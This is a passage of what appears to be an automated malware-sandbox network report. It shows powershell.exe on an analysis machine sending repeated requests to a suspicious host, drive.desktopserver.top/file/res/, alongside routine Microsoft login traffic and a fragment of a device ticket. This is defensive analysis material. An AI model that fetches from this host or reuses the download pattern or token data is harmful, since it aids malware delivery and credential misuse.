                                                                                                                                          Location: https://drive.desktopserver.top/file/res/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wA3pnIXb9rXBxT9Jf%2FPyADjEOC7TOYZ7T1rcLL8le1scxFb9927TUtowfGCn1q96fk44Vxi%2BGFpg89q6znIg4BzM%2BZC%2Fad2CJihJSYych9VFq8wzlnHtLHnZs0ejQfBerrPmL7eMIQqE%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c23388cf4388-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.549755104.21.92.189808544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:34.997261047 CEST177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:35.502593040 CEST868INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:35 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/res/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmYdIUV4gc4ctRd8zqN3lQ0A1C4VHhX0eWnK%2FaCRyE0c%2Fi62tOXp2HJDVZVexGi49xJCPmR%2FtpSiRp1Str8PQFXnqb1%2B%2Bm3mYGR9M5Y%2BUUplEbkQ1nvW9sqpZj9lkRhXCLZZxjfmZzTwkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c2338c4c6a57-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.549756104.21.92.189809064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:35.044239044 CEST177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:35.566787958 CEST864INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:35 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/res/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6YzkR0nb2M9d%2FcyLxi5W581b98ZepWUupFn7XzibJ2%2FR7f1wA%2BaIqaBtVtuloc6pv7fhxOVxwkl5trThKi4x4LVvigEXClmOpu6ZZbGrHpWMe%2BxaqHpIG58TbormxXig8FTU2XXJ1GSQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c233ede842eb-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          0192.168.2.54971440.126.32.133443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:05 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-09-30 16:58:05 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-09-30 16:58:07 UTC653INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Mon, 30 Sep 2024 16:57:06 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30374.3
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C527_SN1
                                                                                                                                          x-ms-request-id: b3b1d000-f429-4b0a-8b12-5c4157ffdab4
                                                                                                                                          PPServer: PPV: 30 H: SN1PEPF0003FB37 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:06 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11389
                                                                                                                                          2024-09-30 16:58:07 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          1192.168.2.54971740.126.32.133443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:08 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4694
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-09-30 16:58:08 UTC4694OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-09-30 16:58:08 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Mon, 30 Sep 2024 16:57:08 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C527_SN1
                                                                                                                                          x-ms-request-id: 511ec9ec-404e-4e98-b9b9-3d09f9830036
                                                                                                                                          PPServer: PPV: 30 H: SN1PEPF0002F188 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:08 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 10901
                                                                                                                                          2024-09-30 16:58:08 UTC10901INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          2192.168.2.54971820.190.159.71443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:08 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-09-30 16:58:08 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-09-30 16:58:08 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Mon, 30 Sep 2024 16:57:08 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BAY
                                                                                                                                          x-ms-request-id: e405c04e-0260-437b-8ee0-5fed1fef67ac
                                                                                                                                          PPServer: PPV: 30 H: PH1PEPF00011F90 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:08 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1918
                                                                                                                                          2024-09-30 16:58:08 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          3192.168.2.54972040.113.103.199443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 53 4a 64 4a 30 4a 52 32 45 71 6e 66 2b 39 72 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 34 39 61 31 32 39 34 65 39 65 39 33 35 65 0d 0a 0d 0a
                                                                                                                                          Data Ascii: CNT 1 CON 305MS-CV: zSJdJ0JR2Eqnf+9r.1Context: d149a1294e9e935e
                                                                                                                                          2024-09-30 16:58:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                          2024-09-30 16:58:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 53 4a 64 4a 30 4a 52 32 45 71 6e 66 2b 39 72 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 34 39 61 31 32 39 34 65 39 65 39 33 35 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 66 43 6e 7a 53 7a 79 76 51 63 39 2b 49 50 79 57 64 4a 62 61 32 41 52 75 2b 78 4b 55 37 73 39 53 69 79 34 4c 50 5a 78 71 64 79 73 71 2b 6a 73 55 44 32 63 50 4f 43 4e 69 68 79 51 49 69 5a 52 6a 37 66 59 7a 4d 6b 4c 38 61 34 54 51 4d 38 2f 32 4e 49 41 58 58 48 73 74 2f 38 59 4d 4b 66 6b 31 66 61 34 34 47 4a 76 4d 66 4a 46 4e
                                                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zSJdJ0JR2Eqnf+9r.2Context: d149a1294e9e935e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATfCnzSzyvQc9+IPyWdJba2ARu+xKU7s9Siy4LPZxqdysq+jsUD2cPOCNihyQIiZRj7fYzMkL8a4TQM8/2NIAXXHst/8YMKfk1fa44GJvMfJFN
                                                                                                                                          2024-09-30 16:58:09 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 7a 53 4a 64 4a 30 4a 52 32 45 71 6e 66 2b 39 72 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 34 39 61 31 32 39 34 65 39 65 39 33 35 65 0d 0a 0d 0a
                                                                                                                                          Data Ascii: BND 3 CON\QOS 56MS-CV: zSJdJ0JR2Eqnf+9r.3Context: d149a1294e9e935e
                                                                                                                                          2024-09-30 16:58:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                                                          2024-09-30 16:58:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 67 55 36 67 46 56 75 39 46 6b 32 65 2f 76 33 73 58 32 50 4c 41 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                          Data Ascii: MS-CV: gU6gFVu9Fk2e/v3sX2PLAQ.0Payload parsing failed.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          4192.168.2.54971920.190.159.71443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:09 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-09-30 16:58:09 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
